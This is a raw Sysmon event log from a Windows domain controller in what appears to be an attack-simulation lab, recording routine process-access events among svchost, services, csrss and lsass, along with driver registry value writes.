13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.525{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.525{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.525{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.525{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4286-6000-0A00-000000009A01}8441116C:\Windows\system32\services.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.510{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.494{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.494{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.494{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.494{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.478{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.478{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.478{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.478{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 